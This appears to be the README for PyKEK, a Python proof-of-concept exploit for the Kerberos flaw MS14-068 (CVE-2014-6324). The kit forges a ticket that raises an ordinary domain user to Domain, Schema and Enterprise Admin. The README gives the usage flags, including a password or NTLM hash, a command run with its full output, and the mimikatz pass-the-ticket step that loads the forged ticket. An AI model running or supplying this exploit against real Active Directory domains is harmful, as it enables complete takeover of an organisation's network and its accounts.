MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员
PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)
For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) .
More is coming...
Sylvain Monné
Contact : sylvain dot monne at solucom dot fr
Special thanks to: Benjamin DELPY gentilkiwi
- kek.krb5: Kerberos V5 (RFC 4120) ASN.1 structures and basic protocol functions
- kek.ccache: Credential Cache Binary Format (cchache)
- kek.pac: Microsoft Privilege Attribute Certificate Data Structure (MS-PAC)
- kek.crypto: Kerberos and MS specific cryptographic functions
Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
- Domain Users (513)
- Domain Admins (512)
- Schema Admins (518)
- Enterprise Admins (519)
- Group Policy Creator Owners (520)
USAGE: -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
-p <clearPassword>
--rc4 <ntlmHash>
root@kali:~/sploit/pykek# python -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0
python.exe -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`